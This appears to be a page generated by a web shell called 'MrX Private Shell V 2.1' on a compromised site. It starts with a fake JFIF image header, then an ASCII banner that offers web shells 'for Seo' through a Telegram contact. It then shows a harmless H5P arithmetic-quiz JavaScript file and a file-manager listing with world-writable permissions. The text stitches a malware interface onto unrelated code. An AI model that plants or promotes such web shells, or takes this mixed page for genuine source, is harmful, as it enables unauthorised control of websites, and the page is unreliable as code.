����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
H5P.ArithmeticQuiz.IntroPage = (function ($, UI) {
/**
* Creates an IntroPage instance
*
* @class
* @namespace H5P.ArithmeticQuiz
* @augments H5P.EventDispatcher
*
* @param {string} text Introduction text
* @param {Object} t Translation object
* @fires H5P.Event
*/
function IntroPage(text, t) {
H5P.EventDispatcher.call(this);
var self = this;
this.$introPage = $('<div>', {
'class': 'h5p-baq-intro-page'
});
var $innerWrapper = $('<div>', {
'class': 'h5p-baq-intro-page-inner'
});
$innerWrapper.append($('<div>', {
'class': 'h5p-baq-intro-page-title'
}).append($('<span>', {
html: text
})));
// Create and add the start button:
UI.createButton({
text: t.startButton,
'class': 'mq-control-button',
click: function () {
self.trigger('start-game');
}
}).appendTo($innerWrapper);
$innerWrapper.appendTo(this.$introPage);
/**
* Append Intropage to a container
*
* @param {H5P.jQuery} $container
*/
self.appendTo = function ($container) {
this.$introPage.appendTo($container);
};
/**
* Remove me from DOM
*/
self.remove = function () {
this.$introPage.remove();
};
}
IntroPage.prototype = Object.create(H5P.EventDispatcher.prototype);
IntroPage.prototype.constructor = IntroPage;
return IntroPage;
})(H5P.jQuery, H5P.JoubelUI);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 4c9d64f83b5dc882ad46c379af0651cede2fa57d | File | 1.42 KB | 0666 |
|